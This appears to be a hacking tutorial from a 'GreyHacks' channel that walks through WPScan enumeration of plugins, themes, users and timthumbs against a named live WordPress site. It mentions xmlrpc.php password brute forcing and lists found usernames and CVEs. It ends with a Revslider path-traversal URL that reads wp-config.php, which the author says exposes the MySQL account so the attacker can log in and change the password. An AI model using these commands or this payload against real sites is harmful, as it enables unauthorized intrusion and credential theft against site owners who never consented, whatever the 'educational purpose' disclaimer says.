Hacking WordPress CMS Website using Kali Linux 2017.1 | Greyhacks

Welcome to GreyHacks Channel

Today I wanna to show you how to Scan Vulnerability WordPress site CMS with Wpscan

on Kali Linux

make you have kali Linux and update to 2017.1 last version

WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

So please hope you understand what I mean sorry for my English version πŸ˜›

our target == www.patwa.co.in

-Enumerate installed plugins …
wpscan.rb –url www.patwa.co.in –enumerate p this one for plugin vulnerability scan

-Enumerate installed themes …
wpscan.rb –url www.patwa.co.in –enumerate t for themes

-Enumerate users …
wpscan.rb –url www.patwa.co.in –enumerate u username bypass will get it

-Enumerate installed timthumbs …
wpscan.rb –url www.patwa.co.in –enumerate tt timthumbs vulnerability

WE should update database

http://www.patwa.co.in/xmlrpc.php lol this is vulnerability can brute force password act WordPress as well

login admin we can brute force also the same thing πŸ™‚
Enumerating usernames …
Identified the following 2 user/s:
| Id | Login | Name |
| 1 | admincp | Patwa Blog |
| 2 | – | – |

not vulnerability πŸ™‚ I will try to use my private but that not well πŸ™‚ I hope you agree

My private tool

WordPress version 3.5.1 WordPress victim

Lol my terminal color blue look like hacker :P:v

Title: WordPress 3.0-4.7 – Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
Fixed in: 4.7.1

Title: WordPress 3.5-4.7.1 – WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
Fixed in: 4.7.2

If you are administrator you should use wpscan scan your owner site and protect update last version

Reference URL like this means that show your vulnerabilities and you can read and exploit follow that vulnerability and test it

you will become a real pentester like Mr robot πŸ˜›

ypo-theme ……….NOT VULN

churchope ……….NOT VULN

Contact-Form ……….NOT VULN

HdFlvPlayer ……….NOT VULN

Com_Joomanager ……….NOT VULN

Com_Aceftp ……….NOT VULN

Com_Cck ……….NOT VULN

Com_Sprv ……….NOT VULN

Cms_Config ……….NOT VULN

Revslider Config Found :== www.patwa.co.in/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

That one of this site vulnerability we can get MySQL account we can log in and change password

This video is for educational purpose only!!

like us on facebook: https://www.facebook.com/greyhacks
follow us on twitter: https://www.twitter.com/greyhacks
our website: https://www.greyhacks.com

Adventures by A Himitsu https://soundcloud.com/a-himitsu
Creative Commons β€” Attribution 3.0 Unportedβ€” CC BY 3.0
Music release by Argofox https://youtu.be/8BXNwnxaVQE
Music provided by Audio Library https://youtu.be/MkNeIUgNPQ8